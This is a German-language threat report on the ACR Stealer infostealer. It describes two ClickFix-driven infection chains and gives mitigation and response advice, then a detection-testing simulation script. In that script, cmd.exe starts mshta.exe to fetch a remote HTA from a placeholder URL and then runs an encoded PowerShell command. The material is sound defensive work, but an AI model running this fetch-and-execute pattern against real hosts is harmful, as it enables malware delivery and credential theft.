SOC Prime Bias: Hoch

20 Jul 2026 06:25 UTC

ACR-Stealer: Zwei Beobachtete Einbruchsketten Während Erhöhter Bedrohungsaktivität

Author Photo
SOC Prime Team linkedin icon Folgen
ACR-Stealer: Zwei Beobachtete Einbruchsketten Während Erhöhter Bedrohungsaktivität
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Zusammenfassung

ACR Stealer ist eine Malwarefamilie, die Informationen stiehlt und ClickFix-ähnliche Social-Engineering-Tricks verwendet, um Unternehmensumgebungen anzugreifen. Die Malware arbeitet über zwei Hauptinfektionsketten: eine, die auf WebDAV-basierte Payloads mit Python-Loadern und blockchain-basierter Command-and-Control setzt, und eine andere, die MSHTA mit steganografischer Payload-Zustellung verwendet. Ihr Hauptziel ist das Stehlen von Browser-Anmeldedaten, Authentifizierungstoken und sensiblen Dokumenten.

Untersuchung

Microsoft Defender-Experten beobachteten zwischen Ende April und Mitte Juni 2026 eine erhöhte Aktivität. Die Untersuchung identifizierte zwei separate Ausführungspfade: eine festplattenbasierte Kampagne, die Python und geplante Aufgaben umfasst, und eine fileless Kampagne, die MSHTA und eine In-Memory-Ausführung von Shellcode nutzt. Analysten dokumentierten auch fortschrittliche Ausweichmethoden, einschließlich Timestomping, verschleiertem PowerShell und blockchain-gestützten Dead-Drop-Resolvern.

Minderung

Organisationen sollten Benutzer schulen, ClickFix-Eingabeaufforderungen zu erkennen, und die Ausführung von nicht vertrauenswürdigen Skripten durch Anwendungssteuerung einschränken. Reduzierung der Gefährdung durch Malvertising und Durchsetzung von Webfilterung können helfen, erste Zugriffsversuche zu stören. Durch Härtung von Endpunkten mit der Einschränkung der Abhängigkeit von im Browser gespeicherten Anmeldedaten und der Durchsetzung von Multi-Faktor-Authentifizierung können das Risiko eines Anmeldedatendiebstahls ebenfalls reduziert werden.

Reaktion

Falls diese Aktivität erkannt wird, sollten betroffene Geräte sofort isoliert und alle möglicherweise kompromittierten Anmeldedaten und Token rotiert werden. Sitzungstoken sollten widerrufen werden, und Ermittler sollten ausgehende Verbindungen zu verdächtigen Remote-Shares oder Bild-Hosting-Diensten überprüfen. EDR im Blockmodus sollte verwendet werden, um die Bedrohung einzudämmen und bösartige Artefakte effizient zu entfernen.

Angriffsfluss

Simulationsausführung

Voraussetzung: Der Telemetrie- & Basislinien-Vorab-Check muss bestanden haben.

Begründung: Dieser Abschnitt beschreibt die genaue Ausführung der Angreifertechnik (TTP), die entwickelt wurde, um die Erkennungsregel auszulösen. Die Befehle und Beschreibungen MÜSSEN direkt die identifizierten TTPs widerspiegeln und darauf abzielen, genau die Telemetriedaten zu erzeugen, die von der Erkennung erwartet werden. Abstrakte oder nicht verwandte Beispiele führen zu Fehldiagnosen.

  • Angriffserzählung & Befehle: Der Angreifer zielt auf einen Benutzer mit einem gefälschten „Browserfehler“ (ClickFix) ab. Sobald der Benutzer den Befehl kopiert und in ein Terminal einfügt, wird cmd.exe aufgerufen. Der Befehl weist mshta.exe an, auf eine entfernte URL zuzugreifen, um ein bösartiges Skript abzurufen. Um einfache Zeichenfolgenerkennung weiter zu umgehen, verwendet das Skript powershell.exe mit einem codierten Befehl (-Enc) um die ACR Stealer-Malware im Speicher herunterzuladen und auszuführen und so traditionelle dateibasierte Scans zu umgehen.

  • Regressionstest-Skript:

    # Simulation der ACR Stealer ClickFix-Kette
    # Schritt 1: Simulation des cmd.exe-Wrappers
    # Schritt 2: Aufruf von mshta.exe mit einer URL
    # Schritt 3: Gefolgt von einem codierten PowerShell-Befehl
    
    $encodedCommand = [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("Write-Host 'Simulating ACR Stealer Payload Execution'"))
    
    Start-Process "cmd.exe" -ArgumentList "/c mshta.exe https://example.com/payload.hta & powershell.exe -Enc $encodedCommand"
  • Bereinigungskommandos:

    # In dieser Simulation werden keine persistenten Dateien erstellt, stellen Sie jedoch sicher, dass keine verwaisten Prozesse verbleiben
    Stop-Process -Name "mshta" -ErrorAction SilentlyContinue
    Stop-Process -Name "powershell" -ErrorAction SilentlyContinue